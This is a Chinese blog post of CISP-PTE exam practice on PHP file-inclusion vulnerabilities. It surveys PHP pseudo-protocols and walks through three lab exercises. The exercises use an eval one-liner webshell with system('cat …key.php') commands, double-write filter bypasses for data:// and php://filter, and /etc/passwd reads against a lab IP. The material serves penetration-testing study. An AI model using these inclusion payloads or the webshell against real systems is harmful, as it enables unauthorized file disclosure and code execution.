iis服务器助手广告广告
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >CISP-PTE考前练习-文件包含
  • 783
分享到

CISP-PTE考前练习-文件包含

php安全web安全 2023-09-02 17:09:33 783人浏览 薄情痞子
摘要

文章目录 ⽂件包含漏洞利⽤的前提伪协议⽂件包含常⽤伪协议使用file:// 访问本地⽂件系统php:// 访问输⼊/输出流phar:// PHP归档 伪协议利⽤⽅式题目1:题目要求解题过

文章目录

⽂件包含漏洞利⽤的前提

WEB 应⽤采⽤ include 等⽂件包含函数,并且需要包含的⽂件路径是通过⽤户传输参数的⽅式引⼊;

⽤户能够控制包含⽂件的参数,被包含的⽂件可被当前⻚⾯访问;

伪协议⽂件包含

file:// 访问本地⽂件系统Http(s):// 访问 https ⽹址ftp:// 访问 ftp URLPHP:// 访问输⼊/输出流Zlib:// 压缩流Data:// 数据ssh2:// security shell2Expect:// 处理交互式的流Glob:// 查找匹配的⽂件路径phar:// php归档rar:// RARogg:// ⾳频流

常⽤伪协议使用

file:// 访问本地⽂件系统

(1) 这个协议可以展现本地⽂件系统,默认⽬录是当前的⼯作⽬录。
(2) 例如: file:///etc/passwd file://key.txt

php:// 访问输⼊/输出流

(1) php://input是个可以访问请求的原始数据的只读流,可以访问请求的原始数据的只读流,将post请求 中的数据作为php代码执⾏。
(2) php://filter是⼀种元封装器,设计⽤于数据流打开时的筛选过滤应⽤。

参数描述使用
resource=<要过滤的数据流>指定了你要筛选过滤的数据流。必选
read=<读链的筛选列表>可以设定一个或多个过滤器名称,以管道符 (1)分隔。可选
write=<写链的筛选列表>可以设定一个或多个过滤器名称,以管道符(分隔。可选
<;两个链的筛选列表>任何没有以 read= 或 write= 作前缀的筛选器列表会视情况应用于读或写链。

phar:// PHP归档

(1) phar://数据流包装器⾃PHP5.3.0起开始有效
(2) 例如: phar://E:/phpstudy/www/1.zip/phpinfo.txt phar://1.zip/phpinfo.txt

伪协议利⽤⽅式

协议测试版本PHPallow_url_fopenallow_urL_include案例
file://>=5.2off/onoff/onfile://var/www/html/key.php
file://filter>=5.2off/onoff/onphp://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini”
php://filter/read=convert.base64-encode/resource=…/key.php
file://input>=5.2onoff/onphp://input[post data]
zip://>=5.2off/onoff/onzip://C:/phpStudy/PHPTutorial/WWW/lsawebtest/phptest\phpinfo.jpg%23phpinfo.txt
compress.bzip2://>=5.2off/onoff/oncompress.zlib2://C:/phpStudy/PHPTutorial/WWW/lsawebtest/phptest/phpinfo.txt.gz
compress.zlib2://./file.bz2
fcompress.zlib://>=5.2off/onoff/oncompress.zlib://C:/phpStudy/PHPTutorial/WWW/lsawebtest/phptest/phpinfo.txt.gz
compress.zlib://./file.bz2
data://>=5.2onondata:text/plain,
data:text/plain;base64,PD9waHAGCGhwaW5mbygpOz8+
data:text/plain,

题目1:

题目要求

在这里插入图片描述

解题过程

第一步 访问,发现是file参数来读取view.html页面内容
在这里插入图片描述

第二步 通过查看view.html,查看数据包源码

通过base64解码

[@eval(base64_decode($_POST[z0]));] //eval函数的一句话,参数z0

在这里插入图片描述

第三步 构造请求参数

按照要求post提交,两个参数hello和z0的值:hello=123&&z0=system('cat /var/www/html/key.php')hello=123&&z0=system('type C:\key.php');hello=123&&z0=c3lzdGVtKCd0eXBlIEM6XGtleS5waHAnKTs=无报错信息

在这里插入图片描述

第四步 查看view.html,发现key存在

题目2:text/plain协议

题目要求

PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。
测试该网站可能存在的包含漏洞,尝试获取webshell,答案就在根目录下key.php文件中。

在这里插入图片描述

解题过程

第一步 查看发现输入,会自动添加个txt
在这里插入图片描述

第二步 通过参数,想要php://filter伪协议包含

发现php://字符被过滤,无法输入查看当前目录下的文件data://text/plain, 

在这里插入图片描述

第三步 通过大小写和双写结合,进行绕过, 查找key的位置

查看当前目录下的文件

dadata://ta://text/plain, 查看上个目录下的文件dadata://ta://text/plain, 

当前目录下的:hello.txt和index.php两个文件
在这里插入图片描述

上级目录下的文件:footer.php [4] => header.php [5] => images [6] => index.php [7] => js [8] => key.php [9] => start ) .txt
在这里插入图片描述

第四步 查看key

dadata://ta://text/plain,

在这里插入图片描述

题目3:php://filter伪协议

题目要求

PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。
测试该网站可能存在的包含漏洞,尝试获取webshell,答案就在根目录下key.php文件中。

在这里插入图片描述

解题过程

第一步 先使用本地包含,发现可以成功
http://150.158.27.164:1083/start/index.php?page=/etc/passwd
在这里插入图片描述

第二步 使用php://filter协议进行包含,双写绕过

Host: 150.158.27.164:1083Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: IsAdmin=false; Username=R3Vlc3Q%3DConnection: close

在这里插入图片描述

http://150.158.27.164:1083/start/index.php?page=php:/php:///filter/read=convert.base64-encode/resource=../key.php

在这里插入图片描述

摘抄


许多人都有这样的体验:每天出门前,总是会花很多时间找钥匙、找证件,或者是其他零碎且必带的东西。
不妨试着每次用过东西后就随手放回原来的位置,这样不仅可以节约时间,也可以减少出门前的焦虑和慌张。
---<随手归位>


来源地址:https://blog.csdn.net/qq_41901122/article/details/127483056

--结束END--

本文标题: CISP-PTE考前练习-文件包含

本文链接: https://www.lsjlt.com/news/391131.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作